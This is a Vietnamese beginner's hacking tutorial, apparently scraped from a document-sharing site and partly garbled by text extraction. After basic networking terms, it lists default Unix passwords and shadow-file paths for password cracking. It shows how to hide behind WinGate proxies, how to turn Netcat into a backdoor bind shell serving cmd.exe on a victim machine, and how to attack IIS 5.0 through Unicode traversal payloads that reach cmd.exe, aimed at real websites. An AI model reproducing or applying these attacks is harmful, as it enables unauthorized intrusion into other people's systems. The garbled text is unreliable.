làm thế nào để trở thành một hacker thực thụ

65 1.6K 0
làm thế nào để trở thành một hacker thực thụ

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

Thông tin tài liệu

Nhiều bạn Newbie có hỏi tôi “ Hack là như thế nào ? Làm sao để hack ?” Nhưng các bạn đã quên mất một điều là các bạn cần phảI có kiến thức một cách tổng quát , hiểu các thuật ngữ mà những người rành về mạng hay sử dụng . Riêng tôi thì chưa thật giỏi bao nhiêu nhưng qua nghiên cứu tôi cũng đã tổng hợp được một số kiến thức cơ bản , muốn chia sẻ cho tất cả các bạn , nhằm cùng các bạn học hỏi . Tôi sẽ không chịu trách nhiệm nếu các bạn dùng nó để quậy phá ngườI khác . Các bạn có thể copy hoặc post trong các trang Web khác nhưng hãy điền tiên tác giả ở dướI bài , tôn trọng bài viết này cũng chính là tôn trọng tôi và công sức của tôi , đồng thờI cũng tôn trọng chính bản thân các bạn . Trong này tôi cũng có chèn thêm một số cách hack , crack và ví dụ căn bản , các bạn có thể ứng dụng thử và nghiên cứu đọc nó để hiểu thêm , rồ khi bắt gặp một từ mà các bạn không hiểu thì hãy đọc bài này để biết , trong này tôi có sử dụng một số ý của bài viết mà tôi thấy rất hay từ trang Web của HVA , và các trang Web khác mà tôi đã từng ghé thăm . Xin cảm ơn những tác giả đã viết những bài ấy . Bây giờ là vấn đề chính .

Tự bạch : Nhiều bạn Newbie có hỏi tơi “ Hack ? Làm để hack ?” Nhưng bạn quên điều bạn cần phảI có kiến thức cách tổng quát , hiểu thuật ngữ mà người rành mạng hay sử dụng Riêng tơi chưa thật giỏi qua nghiên cứu tổng hợp số kiến thức , muốn chia sẻ cho tất bạn , nhằm bạn học hỏi Tôi không chịu trách nhiệm bạn dùng để quậy phá ngườI khác Các bạn copy post trang Web khác điền tiên tác giả dướI , tôn trọng viết tơn trọng tơi cơng sức tơi , đồng thờI tơn trọng thân bạn Trong tơi có chèn thêm số cách hack , crack ví dụ , bạn ứng dụng thử nghiên cứu đọc để hiểu thêm , rồ bắt gặp từ mà bạn không hiểu đọc để biết , tơi có sử dụng số ý viết mà thấy hay từ trang Web HVA , trang Web khác mà ghé thăm Xin cảm ơn tác giả viết Bây vấn đề ==================================================== ) Ta cần để bắt đầu ? Có thể nhiều bạn khơng đồng ý với cách tốt để thực tập bạn dùng HĐH Window 9X , rồI đến khác mạnh Linux Unix , dướI bạn cần có : + Một OS ( DOS , Window 9X , Linux , Unit ….) + Một trang Web tốt ( HVA chẳng hạn hi`hi` ) + Một trình duyệt mạng tốt ( Nescape , IE , tốt có lẽ Gozzila ) + Một công cụ chat tốt ( mIRC ,Yahoo Mass … ) + Telnet ( tương tự nmap …) + Cái quan trọng mà muốn trở thành hacker phảI có chút kiến thức lập trình ( C , C++ , Visual Basic , Pert … ) ) Thế địa IP ? _ Địa IP chia thành số giới hạn từ - 255 Mỗi số lưu byte -> !P có kicks thước 4byte, chia thành lớp địa Có lớp A, B, C Nếu lớp A, ta có 16 triệu điạ chỉ, lớp B có 65536 địa Ví dụ: Ở lớp B với 132.25,chúng ta có tất địa từ 132.25.0.0 đến 132.25.255.255 Phần lớn địa lớp A llà sở hữu công ty hay tổ chức Một ISP thường sở hữu vài địa lớp B C Ví dụ: Nếu địa IP bạn 132.25.23.24 bạn xác định ISP bạn ( có IP 132.25.x.) _ IP từ viết tắt Internet Protocol, Internet địa IP mỗI người đạI diện cho ngườI đó, địa IP sử dụng máy tính khác để nhận biết máy tính kết nối chúng Đây lí bạn lại bị IRC cấm, cách người ta tìm IP bạn Địa IP dễ dàng phát ra, người ta lấy qua cách sau : + bạn lướt qua trang web, IP bạn bị ghi lại + IRC, có IP bạn + ICQ, người biết IP bạn, chí bạn chọn "do not show ip" người ta lấy + bạn kết nối với đó, họ gõ "systat –n ", biết kết nối đên họ + gửi cho bạn email với đoạn mã java tóm IP, họ tóm IP bạn ( Tài liệu HVA ) ) Làm để biết địa IP ? Run đánh lệnh “winipcfg”  _ Trong Window : vào Start _ Trong mIRC : kết nốI đến máy chủ sau đánh lệnh “/dns ” _ Thông qua số trang Web có hiển thị IP ) IP Spoofing ? _ Một số IP có mục đích để xác định thiết bị giới Vì mạng máy chủ cho phép thiết bị khác trao đổi liệu qua lại mà không cần kiểm tra máy chủ Tuy nhiên thay đổi IP bạn, nghĩa bạn gởi thơng tin giả đến máy khác mà máy tin thông tin nhận xuất phát từ máy (tất nhiên khơng phải máy bạn) Bạn vượt qua máy chủ mà khơng cần phải có quyền điều khiến máy chủ Điều trở ngại chỗ thông tin phản hồi từ máy chủ gởi đến thiết bị có IP mà giả mạo Vì bạn khơng có phản hồi thơng tin mà mong muốn Có lẽ điều mà spoof IP có hiệu bạn cần vượt qua firewall, trộm account cần dấu thông tin cá nhân! ( Tài liệu HVA ) ) Trojan / worm / virus / logicbomb ? _ Trojan : Nói cho dễ hiểu chương trình điệp viên cài vào máy ngườI khác để ăn cắp nhũng tài liệu máy gửI cho chủ nhân , Cái mà ăn cắp mật , accourt , hay cookie ……… tuỳ theo ý muốn ngườI cài _ virus : Nói cho dễ hiểu chương trình vớI mã đặc biệt cài ( lây lan từ máy khác ) lên máy nạn nhân thực yêu cầu mã , đa số virut sử dụng để phá hoạI liệu phá hoạI máy tính _ worm : Đây chương trình độc lập tự nhân bản thân lây lan khắp bên mạng Cũng giống Virut , phá hoạI liệu , phá hoạI bên mạng , nhiều cịn làm down mang _ logicbomb : Là chương trình gửi lúc nhiều gói liệu cho địa , làm ngập lụt hệ thống , tắt nghẽn đường truyền ( server ) dùng làm công cụ để “khủng bố” đốI phương ( bom Mail ) ;) ) PGP ? _ PGP viết tắt từ “Pretty Good Privacy” , công cụ sử dụng mã hố chìa khố cơng cộng để bảo vệ hồ sơ Email liệu , dạng mã hố an tồn cao sử dụng phần mềm cho MS_DOS , Unix , VAX/VMS cho dạng khác ) Proxy ? _Proxy cung cấp cho người sử dụng truy xuất internet với host đơn Những proxy server phục vụ nghi thức đặt biệt tập nghi thức thực thi dual_homed host basion host Những chương trình client người sử dung qua trung gian proxy server thay cho server thật mà người sử dụng cần giao tiếp Proxy server xác định yêu cầu từ client định đáp ứng hay không đáp ứng, yêu cầu đáp ứng, proxy server kết nối với server thật thay cho client tiếp tục chuyển tiếp đến yêu cầu từ clientđến server, đáp ứng yêu cầu server đến client Vì proxy server giống cầu nối trung gian server client _ Proxy cho user truy xuất dịch vụ internet theo nghĩa trực tiếp Với dual host homed cần phải login vào host trước sử dụng dịch vụ internet Điều thường không tiện lợi, số người trể nên thất vọng họ có cảm giác thơng qua firewall, với proxy giải vấn đề Tất nhiên cịn có giao thức nói chung tiện lợi cho user Bởi proxy cho phép user truy xuất dịch vụ internet từ hệ thống cá nhân họ, khơng cho phép packet trực tiếp hệ thống sử dụng internet đường giáng tiếp thông qua dual homed host thông qua kết hợp bastion host screening rounter ( Bài viết Z3RON3 – tài liệu HVA ) ) Unix ? _ Unix hệ điều hành ( giống Window ) Nó hệ điều hành mạnh , thân thiết với Hacker Nếu bạn trở thành hacker thật HĐH khơng thể thiếu đối vớI bạn Nó sử dụng hỗ trợ cho lập trình ngơn ngữ C ) Telnet ? _ Telnet chương trình cho phép ta kết nốI đến máy khác thông qua cổng ( port ) MọI máy tính máy chủ ( server ) có cổng , sau số cổng thông dụng : + Port 21: FTP + Port 23: Telnet + Port 25: SMTP (Mail) + Port 37: Time + Port 43: Whois _ Ví dụ : bạn gọI Telnet để kết nốI đến mail.virgin.net port 25 10 ) Làm để biết Telnet đến hệ thống Unix ? _ Ok , tơi nói cho bạn biết hệ thống Unix chào hỏI bạn bạn kết nối tới Đầu tiên , bạn gọi Unix , thơng thường xuất dấu nhắc : “ Log in : ” , ( nhiên , với chưa chắn Unix ngoạI trừ chúng xuất thông báo trước chữ “ log in :” ví dụ : Welcome to SHUnix Please log in ….) Bây ta tạI dấu nhắc “log in” , bạn cần phảI nhập vào account hợp lệ Một account thông thường gồm có đặc tính , sau bạn nhập account vào , bạn thấy có mật , bạn thử nhập Default Password thử theo bảng sau : Account -Default Password Root -Root Sys Sys / System / Bin Bin -Sys / Bin Mountfsy Mountfsys Nuuc -Anon Anon -Anon User User Games -Games Install Install Demo -Demo Guest Guest 11 ) shell account ? _ Một shell account cho phép bạn sử dụng máy tính nhà bạn thiết bị đầu cuốI ( terminal ) mà vớI bạn đánh lệnh đến máy tính chạy Unix , “Shell” chương trình có nhiệm vụ dịch ký tự bạn gửi đến rồI đưa vào thực lệnh chương trình Unix VớI shell account xác bạn sử dụng trạm làm việc mạnh nhiều so vớI mà bạn tưởng tượng đến Bạn lấy “shell account” miễn phí tạI trang Web www.freeshell.com nhiên bạn khơng sử dụng “telnet” bạn trả tiền cho 12 ) Làm cách để bạn crack Unix account passwords ? _ Rất đơn giản , nhiên cách mà tơi nói vớI bạn “lạc hậu” rồI , bạn crack chúng bạn may mắn , cịn khơng bạn đọc để tham khảo _ Đầu tiên bạn đăng nhập vào hệ thống có sử dụng Unix khách hàng ngườI khách ghé thăm , may mắn bạn lấy mật cất dấu hệ thống chuẩn : /etc/passwd hàng hồ sơ passwd có tài khoản khác , giống hàng : userid:password:userid#:groupid#:GECOS field:home dir:shell : + userid = the user id name : tên đăng nhập : tên số + password : mật mã Dùng để làm hẳn bạn biết rồI + userid# : số đựơc thông báo cho ngườI đăng ký họ đăng ký mớI lần + groupid# : tương tự userid# , dùng cho ngườI nhóm ( nhóm Hunter Buq HVA chẳng hạn ) + GECOS FIELD : nơi chứa thông tin cho ngườI sử dụng , có họ tên đầy đủ , số điện thoại , địa v.v… Đây nguồn tốt để ta dễ dàng crack mật + home dir : thư mục ghi lạI hoạt động người khách họ ghé thăm ( giống mục History IE ) + Shell : tên shell mà tự động bắt đầu ta login _ Hãy lấy file password , lấy file text mã hoá , sau bạn dùng chương trình "CrackerJack" "John the Ripper" để crack _ Các bạn thấy dễ phảI không ? Sai bét , không dễ dàng may mắn để bạn crack hầu hết họ cất kỹ , đọc tiếp bạn thấy khó khăn chỗ 13 ) shadowed password ? _ Một shadowed password biết đến file Unix passwd , bạn nhập mật , ngườI khác thấy trình đơn ( ký hiệu “ X ” “ * ” ) Cái thông báo cho bạn biết file passwd cất giữ nơi khác , nơi mà ngườI sử dụng bình thường khơng thể đến Khơng lẽ ta đành bó tay , dĩ nhiên đốI vớI hacker khơng rùi , ta không đến trực tiếp file shadowed password ta tìm file lưu , file Unshadowed Những file hệ thống Unix không cố định , bạn thử vớI đường dẫn sau : CODE AIX /etc/security/passwd ! or /tcb/auth/files// A/UX 3.0s /tcb/files/auth/?/ * BSD4.3-Reno /etc/master.passwd * ConvexOS 10 /etc/shadpw * ConvexOS 11 /etc/shadow * DG/UX /etc/tcb/aa/user/ * EP/IX /etc/shadow x HP-UX /.secure/etc/passwd * IRIX /etc/shadow x Linux 1.1 /etc/shadow * OSF/1 /etc/passwd[.dir|.pag] * SCO Unix #.2.x /tcb/auth/files// SunOS4.1+c2 /etc/security/passwd.adjunct =##username SunOS 5.0 /etc/shadow System V Release 4.0 /etc/shadow x System V Release 4.2 /etc/security/* database Ultrix /etc/auth[.dir|.pag] * UNICOS /etc/udb =20 Trước dấu “ / ”đầu tiên hàng tên hệ thống tương ứng , vào hệ thông thật bạn muốn lấy rồI lần theo đường dẫn phía sau dấu “/”đầu tiên Và cuốI account passwd mà crack , hết hiệu lực rồI : CODE arif:x:1569:1000:Nguyen Anh Chau:/udd/arif:/bin/ksh arigo:x:1570:1000:Ryan Randolph:/udd/arigo:/bin/ksh aristo:x:1573:1000:To Minh Phuong:/udd/aristo:/bin/ksh armando:x:1577:1000:Armando Huis:/udd/armando:/bin/ksh arn:x:1582:1000:Arn mett:/udd/arn:/bin/ksh arne:x:1583:1000:Pham Quoc Tuan:/udd/arne:/bin/ksh aroon:x:1585:1000:Aroon Thakral:/udd/aroon:/bin/ksh arozine:x:1586:1000: Mogielnicki:/udd/arozine:/bin/bash arranw:x:1588:1000:Arran Whitaker:/udd/arranw:/bin/ksh Để bảo đảm bí mật nên pass họ tơi xố để vào ký hiệu “ x ” , bạn tìm hiểu thơng tin có từ chúng xem ( (Hết phần ) 14 ) Vitual port ? _ Vitual port ( cổng ảo ) số tự nhiên đựợc gói TCP(Tranmission Control Protocol) UDP(User Diagram Protocol) header Như ngi biết, Windows chạy nhiều chương trình lúc, chương trình có cổng riêng dùng để truyền nhận liệu Ví dụ máy có địa IP 127.0.0.1 chạy WebServer, FTP_Server, POP3 server, etc, dịch vụ đuọc chạy IP address 127.0.0.1, gói tin đuọc gửi đến làm máy tính phân biệt gói tin vào dịch vụ WebServer hay FTP server hay SM! TP? Chính Port xuất Mỗi dịch vụ có số port mặc định, ví dụ FTP có port mặc định 21, web service có port mặc định 80, POP3 110, SMTP 25 vân vân Người quản trị mạng thay đổi số port mặc định này, bạn ko biết số port máy chủ, bạn ko thể kết nối vào dịch vụ Chắc bạn nghe nói đến PORT MAPPING có lẽ chưa biết chức Port mapping thực đơn giản trình chuyển đổi số port mặc định dịch vụ đến số khác Ví dụ Port mặc định WebServer 80, có lẽ bạn thấy http://www.xxx.com:8080 , 8080 số port host xxx đuợc nguòi quản trị host "map" từ 80 thành 8080 ( Tài liệu HVA ) 15 ) DNS ? _ DNS viết tắt Domain Name System Một máy chủ DNS đợi kết nối cổng số 53, có nghĩa bạn muốn kết nối vào máy chủ đó, bạn phải kết nối đến cổng số 53 Máy chủ chạy DNS chuyển hostname chữ thành chữ số tương ứng ngược lại Ví dụ: 127.0.0.1 > localhost localhost ->127.0.0.1 ( Tài liệu HVA ) 16 ) Đôi điều Wingate : _ WinGate chương trình đơn giản cho phép bạn chia kết nối Thí dụ: bạn chia sẻ modem với nhiều máy WinGate dùng với nhiều proxy khác che giấu bạn _ Làm để Wingate che dấu bạn ? Hãy làm theo : Bạn telnet cổng 23 máy chủ chạy WinGate telnet proxy bạn có dấu nhắc WinGate > Tại dấu nhắc bạn đánh vào tên server, khoảng trống cổng bạn muốn kết nối vào VD : CODE telnet wingate.net WinGate> victim.com 23 ta telnet đến cổng 23 cổng mặc định bạn cài Wingate lúc IP máy mà victim chộp ta IP máy chủ chứa Wingate proxy _ Làm để tìm Wingate ? + Nếu bạn muốn tìm IP WinGates tĩnh (IP khơng đổi) đến yahoo hay trang tìm kiếm cable modem Tìm kiếm cable modems nhiều người dùng cable modems có WinGate để họ chia sẻ đường truyền rộng cable modems cho máy khác nhà Hoặc bạn dùng Port hay Domain scanners scan Port 1080 + Để tìm IP động (IP thay đổi lần user kết nối vào internet) WinGates bạn dùng Domscan chương trình qt khác Nếu dùng Domscan bạn nhập khoảng IP vào box số 23 vào box thứ Khi có kết , bạn thử telnet đến địa IP tìm đựơc ( hướng dẫn ), xuất dấu “Wingate >” bạn tìm máy sử dụng Wingate rồI + Theo kinh nghiệm tơi bạn down wingatescanner mà sài , có nhièu mạng 17 ) Đôi điều Traceroute : _ Traceroute chương trình cho phép bạn xác định đường gói packets từ máy bạn đến hệ thống đích mạng Internet _ bạn xem VD sau : CODE C:\windows>tracert 203.94.12.54 Tracing route to 203.94.12.54 over a maximum of 30 hops abc.netzero.com (232.61.41.251) ms ms ms xyz.Netzero.com (232.61.41.0) ms ms ms 232.61.41.10 (232.61.41.251) ms 11 ms 13 ms we21.spectranet.com (196.01.83.12) 535 ms 549 ms 513 ms isp.net.ny (196.23.0.0) 562 ms 596 ms 600 ms 196.23.0.25 (196.23.0.25) 1195 ms1204 ms backbone.isp.ny (198.87.12.11) 1208 ms1216 ms1233 ms asianet.com (202.12.32.10) 1210 ms1239 ms1211 ms south.asinet.com (202.10.10.10) 1069 ms1087 ms1122 ms 10 backbone.vsnl.net.in (203.98.46.01) 1064 ms1109 ms1061 ms 11 newdelhi-01.backbone.vsnl.net.in (203.102.46.01) 1185 ms1146 ms1203 ms 12 newdelhi-00.backbone.vsnl.net.in (203.102.46.02) ms1159 ms1073 ms 13 mtnl.net.in (203.194.56.00) 1052 ms 642 ms 658 ms Tôi cần biết đường từ máy đến host mạng Internet có địa ip 203.94.12.54 Tơi cần phải tracert đến nó! Như bạn thấy trên, gói packets từ máy tơi muốn đến 203.94.12.54 phải qua 13 hops(mắc xích) mạng Đây đưịng gói packets _ Bạn xem VD : CODE host2 # traceroute xyz.com traceroute to xyz.com (202.xx.12.34), 30 hops max, 40 byte packets isp.net (202.xy.34.12) 20ms 10ms 10ms xyz.com (202.xx.12.34) 130ms 130ms 130ms + Dòng cho biết hostname địa IP hệ thống đích Dịng cịn cho biết thêm giá trị TTL Run > gõ Telnet) để dùng shell account Sau số địa bạn đăng ký free shell account : http://www.freedomshell.com/ http://www.cyberspace.org/shell.html http://www.ultrashell.net/ _Công cụ thứ : NMAP Cơng cụ qt cực nhanh mạnh Có thể quét mạng diện rộng đặc biệt tốt mạng đơn lẻ NMAP giúp bạn xem dịch vụ chạy server (services / ports : webserver , ftpserver , pop3, ),server dùng hệ điều hành gì,loại tường lửa mà server sử dụng, nhiều tính khác.Nói chung NMAP hỗ trợ hầu hết kỹ thuật quét : ICMP (ping aweep),IP protocol , Null scan , TCP SYN (half open), NMAP đánh giá công cụ hàng đầu Hacker nhà quản trị mạng giới Mọi thông tin NMAP bạn tham khảo http://www.insecure.org/ _ Công cụ thứ : Stealth HTTP Security Scanner công cụ quét lỗi bảo mật tuyệt vời Win32 Nó quét 13000 lỗi bảo mật nhận diện 5000 exploits khác _ Công cụ thứ : IntelliTamper công cụ hiển thị cấu trúc Website gồm thư mục file nào, liệt kê thư mục file có set password Rất tiện cho việc Hack Website trước bạn Hack Website bạn phải nắm số thơng tin Admin Website _ Cơng cụ thứ : Netcat công cụ đọc ghi liệu qua mạng thông qua giao thức TCP UDP Bạn dùng Netcat cách trực tiếp sử dụng chương trình script khác để điều khiển Netcat Netcat coi exploitation tool tạo liên kết bạn server cho việc đọc ghi liệu ( tất nhiên Netcat cài server bị lỗI ) Mọi thơng tin Netcat bạn tham khảo http://www.l0pht.com/ _ Công cụ thứ : Active Perl công cụ đọc file Perl đuôi *.pl exploit thường viết Perl Nó cịn sử dụng để thi hành lệnh thơng qua file *.pl _ Công cụ thứ : Linux hệ điều hành hầu hết hacker sử dụng _ Công cụ thứ : L0phtCrack công cụ số để Crack Password Windows NT/2000 _ Cách Download bày nên khơng nói , bạn Download nhớ ý đến phiên chúng , phiên có số lớn bạn Down mà sài có thêm số tính mà phiên trước chưa có Nếu down mà bạn sử dụng tìm lại viết cũ có hướng dẫn bên Box “Đồ nghề” Nếu không thấy post hỏi , bạn bên trả lời cho bạn 48 ) Hướng dẫn sử dụng Netcat : a ) Giới thiệu : Netcat công cụ thiếu bạn muốn hack website mạnh tiện dụng Do bạn cần biết chút Netcat b ) Biên dịch : _ Đối với Netcat cho Linux, bạn phải biên dịch trước sử dụng - hiệu chỉnh file netcat.c vi: vi netcat.c + tìm dịng res_init(); main() thêm vào trước dấu "/": // res_init(); + thêm dòng sau vào phần #define (nằm đầu file): #define GAPING_SECURITY_HOLE #define TELNET - biên dịch: make linux - chạy thử: /nc -h - bạn muốn chạy Netcat nc thay cho /nc, bạn cần hiệu chỉnh lại biến môi trường PATH file ~/.bashrc, thêm vào ":." PATH=/sbin:/usr/sbin: : _ Bản Netcat cho Win khơng cần phải compile có sẵn file nhị phân nc.exe Chỉ giải nén chạy xong c ) Các tùy chọn Netcat : _ Netcat chạy chế độ dòng lệnh Bạn chạy nc -h để biết tham số: CODE C:\>nc -h connect to somewhere: nc [-options] hostname port[s] [ports] listen for inbound: nc -l -p port [options] [hostname] [port] options: -d - tách Netcat khỏi cửa sổ lệnh console, Netcat chạy chế độ steath(không hiển thị Taskbar) -e prog - thi hành chương trình prog, thường dùng chế độ lắng nghe -h - gọi hướng dẫn -i secs - trì hỗn secs mili giây trước gởi dịng liệu -l - đặt Netcat vào chế độ lắng nghe để chờ kết nối đến -L buộc Netcat "cố" lắng nghe Nó lắng nghe trở lại sau ngắt kết nối -n dùng địa IP dạng số, chẳng hạn 192.168.16.7, Netcat không thẩm vấn DNS -o file ghi nhật kí vào file -p port - định cổng port -r yêu cầu Netcat chọn cổng ngẫu nhiên(random) -s addr - giả mạo địa IP nguồn addr -t - không gởi thông tin phụ phiên telnet Khi bạn telnet đến telnet daemon(telnetd), telnetd thường yêu cầu trình telnet client bạn gởi đến thơng tin phụ biến môi trường TERM, USER Nếu bạn sử dụng netcat với tùy chọn -t để telnet, netcat không gởi thông tin đến telnetd -u - dùng UDP(mặc định netcat dùng TCP) -v - hiển thị chi tiết thông tin kết nối -vv - hiển thị thông tin chi tiết -w secs đặt thời gian timeout cho kết nối secs mili giây -z - chế độ zero I/O, thường sử dụng scan port Netcat hổ trợ phạm vi cho số hiệu cổng Cú pháp cổng1-cổng2 Ví dụ: 1-8080 nghĩa 1,2,3, ,8080 d ) Tìm hiểu Netcat qua VD : _ Chộp banner web server : Ví dụ: nc đến 172.16.84.2, cổng 80 CODE C:\>nc 172.16.84.2 80 HEAD / HTTP/1.0 (tại bạn gõ Enter lần) HTTP/1.1 200 OK Date: Sat, 05 Feb 2000 20:51:37 GMT Server: Apache-AdvancedExtranetServer/1.3.19 (Linux-Mandrake/3mdk) mod_ssl/2.8.2 OpenSSL/0.9.6 PHP/4.0.4pl1 Connection: close Content-Type: text/html Để biết thông tin chi tiết kết nối, bạn dùng –v ( -vv cho biết thông tin chi tiết nữa) C:\>nc -vv 172.16.84.1 80 CODE 172.16.84.1: inverse host lookup failed: h_errno 11004: NO_DATA (UNKNOWN) [172.16.84.1] 80 (?) open HEAD / HTTP/1.0 HTTP/1.1 200 OK Date: Fri, 04 Feb 2000 14:46:43 GMT Server: Apache/1.3.20 (Win32) Last-Modified: Thu, 03 Feb 2000 20:54:02 GMT ETag: "0-cec-3899eaea" Accept-Ranges: bytes Content-Length: 3308 Connection: close Content-Type: text/html sent 17, rcvd 245: NOTSOCK Nếu muốn ghi nhật kí, dùng -o Ví dụ: nc -vv -o nhat_ki.log 172.16.84.2 80 xem file nhat_ki.log xem thử ghi : CODE < 00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d # HTTP/1.1 200 OK < 00000010 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 34 20 46 # Date: Fri, 04 F < 00000020 65 62 20 32 30 30 30 20 31 34 3a 35 30 3a 35 34 # eb 2000 14:50:54 < 00000030 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 # GMT Server: Ap < 00000040 61 63 68 65 2f 31 2e 33 2e 32 30 20 28 57 69 6e # ache/1.3.20 (Win < 00000050 33 32 29 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 # 32) Last-Modifi < 00000060 65 64 3a 20 54 68 75 2c 20 30 33 20 46 65 62 20 # ed: Thu, 03 Feb < 00000070 32 30 30 30 20 32 30 3a 35 34 3a 30 32 20 47 4d # 2000 20:54:02 GM < 00000080 54 0d 0a 45 54 61 67 3a 20 22 30 2d 63 65 63 2d # T ETag: "0-cec< 00000090 33 38 39 39 65 61 65 61 22 0d 0a 41 63 63 65 70 # 3899eaea" Accep < 000000a0 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d # t-Ranges: bytes < 000000b0 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a # Content-Length: < 000000c0 20 33 33 30 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f # 3308 Connectio < 000000d0 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e # n: close Conten < 000000e0 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d # t-Type: text/htm < 000000f0 6c 0d 0a 0d 0a # l dấu < nghĩa server gởi đến netcat dấu > nghĩa netcat gởi đến server _ Quét cổng : Bạn chạy netcat với tùy chọn –z Nhưng để quét cổng nhanh hơn, bạn dùng -n netcat khơng cần thấm vấn DNS Ví dụ để scan cổng TCP(1->500) host 172.16.106.1 CODE [dt@vicki /]# nc -nvv -z 172.16.106.1 1-500 (UNKNOWN) [172.16.106.1] 443 (?) open (UNKNOWN) [172.16.106.1] 139 (?) open (UNKNOWN) [172.16.106.1] 111 (?) open (UNKNOWN) [172.16.106.1] 80 (?) open (UNKNOWN) [172.16.106.1] 23 (?) open bạn cần scan cổng UDP, dùng -u CODE [dt@vicki /]# nc -u -nvv -z 172.16.106.1 1-500 (UNKNOWN) [172.16.106.1] 1025 (?) open (UNKNOWN) [172.16.106.1] 1024 (?) open (UNKNOWN) [172.16.106.1] 138 (?) open (UNKNOWN) [172.16.106.1] 137 (?) open (UNKNOWN) [172.16.106.1] 123 (?) open (UNKNOWN) [172.16.106.1] 111 (?) open _ Biến Netcat thành trojan : Trên máy tính nạn nhân, bạn khởi động netcat vào chế độ lắng nghe, dùng tùy chọn –l ( listen ) -p port để xác định số hiệu cổng cần lắng nghe, -e để yêu cầu netcat thi hành chương trình có kết nối đến, thường shell lệnh cmd.exe ( NT) /bin/sh(đối với Unix) Ví dụ: CODE E:\>nc -nvv -l -p 8080 -e cmd.exe listening on [any] 8080 connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3159 sent 0, rcvd 0: unknown socket error Trên máy tính dùng để công, bạn việc dùng netcat nối đến máy nạn nhân cổng định, chẳng hạn 8080 CODE C:\>nc -nvv 172.16.84.2 8080 (UNKNOWN) [172.16.84.2] 8080 (?) open Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp E:\>cd test cd test E:\test>dir /w dir /w Volume in drive E has no label Volume Serial Number is B465-452F Directory of E:\test [.] [ ] head.log NETUSERS.EXE NetView.exe ntcrash.zip password.txt pwdump.exe File(s) 262,499 bytes Dir(s) 191,488,000 bytes free C:\test>exit exit sent 20, rcvd 450: NOTSOCK Như bạn thấy , ta làm máy nạn nhân , cần số lệnh , ta chiếm máy tính đối phương , bạn xem tiếp : CODE E:\>nc -nvv -L -p 8080 -e cmd.exe listening on [any] 8080 ? ? Riêng Netcat cho Win, bạn lắng nghe cổng lắng nghe Chỉ cần định địa nguồn -s Ví dụ: CODE netstat -a TCP nan_nhan:domain nan_nhan:0 LISTENING nc -nvv -L -e cmd.exe -s 172.16.84.1 -p 53 -> lắng nghe cổng 53 listening on [172.16.84.1] 53 connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3163? ? Trên Windows NT, để đặt Netcat chế độ lắng nghe, không cần phải có quyền Administrator, cần login vào với username bình thường khởi động Netcat xong Chú ý: bạn chạy netcat với -u -e cmd.exe -u -e /bin/sh netcat khơng làm việc Nếu bạn muốn có UDP shell Unix, dùng udpshell thay cho netcat ( Dựa theo viết huynh Vicky ) 49 ) Kỹ thuật hack IIS server 5.0 : _ IIS server với phiên từ trước đến phiên 5.0 có lỗi để ta khai thác , hầu hết người dùng IIS server 5.0 nên lỗi phiên trước không đề cập đến Bây bày bạn cách hack thông qua công cụ activeperl IE , bạn vận dụng cho trang Web VN chúng bị lỗi nhiều Ta bắt đầu _ Trước hết bạn download activeperl Unicode.pl _ Sử dụng telnet để xác định trang Web ta cơng có sử dụng IIS server 5.0 hay khơng : CODE telnet < tên trang Web > 80 GET HEAD / HTTP/1.0 Nếu khơng báo cho ta biết mục tiêu sử dụng chương trình bạn thay đổi cổng 80 cổng khác 8080, 81, 8000, 8001 v.v… _ Sau xác định mục tiêu bạn vào DOS gõ : CODE perl unicode.pl Host: ( gõ địa server mà bạn muốn hack ) Port: 80 ( 8080, 81, 8000, 8001 tuỳ theo cổng mà ta telnet trước ) _ Các bạn thấy bảng liệt kê lỗi ( lập trình Unicode.pl ) sau : CODE [1] /scripts/ %c0%af /winnt/system32/cmd.exe?/c+ [2]/scripts %c1%9c /winnt/system32/cmd.exe?/c+ [3] /scripts/ %c1%pc /winnt/system32/cmd.exe?/c+ [4]/scripts/ %c0%9v /winnt/system32/cmd.exe?/c+ [5] /scripts/ %c0%qf /winnt/system32/cmd.exe?/c+ [6] /scripts/ %c1%8s /winnt/system32/cmd.exe?/c+ [7] /scripts/ %c1%1c /winnt/system32/cmd.exe?/c+ [8] /scripts/ %c1%9c /winnt/system32/cmd.exe?/c+ [9] /scripts/ %c1%af /winnt/system32/cmd.exe?/c+ [10] /scripts/ %e0%80%af /winnt/system32/cmd.exe?/c+ [11]/scripts/ %f0%80%80%af /winnt/system32/cmd.exe?/c+ [12] /scripts/ %f8%80%80%80%af /winnt/system32/cmd.exe?/c+ [13]/scripts/ %fc%80%80%80%80%af /winnt/system32/cmd.exe?/c+ [14]/msadc/ \%e0\%80\%af / \%e0\%80\%af / \ %e0\%80\%af /winnt/system32/cmd.exe?/c+ [15]/cgi-bin/ %c0%af %c0%af %c0%af %c0%af %c0%af /winnt/system32/cmd.exe?/c+ [16]/samples/ %c0%af %c0%af %c0%af %c0%af %c0%af /winnt/system32/cmd.exe?/c+ [17]/iisadmpwd/ %c0%af %c0%af %c0%af %c0%af %c0%af /winnt/system32/cmd.exe?/c+ [18]/_vti_cnf/ %c0%af %c0%af %c0%af %c0%af %c0%af /winnt/system32/cmd.exe?/c+ [19]/_vti_bin/ %c0%af %c0%af %c0%af %c0%af %c0%af /winnt/system32/cmd.exe?/c+ [20]/adsamples/ %c0%af %c0%af %c0%af %c0%af %c0%af /winnt/system32/cmd.exe?/c+ Các bạn thấy tất lỗi trang Web nạn nhân bị tất lỗi , server nạn nhân bị lỗi thứ 13 17 bảng kết xuất dòng thứ 13 17 mà Tôi lấy VD bảng kết cho biết trang Web nạn nhân bị lỗi thứ , IE nhập đoạn mã tương ứng Address : http://www.xxx.com/scripts/ %c1%pc /winnt/system32/cmd.exe?/c+ < == lỗi dòng thứ http://www.xxx.com/scripts/ %c1%1c 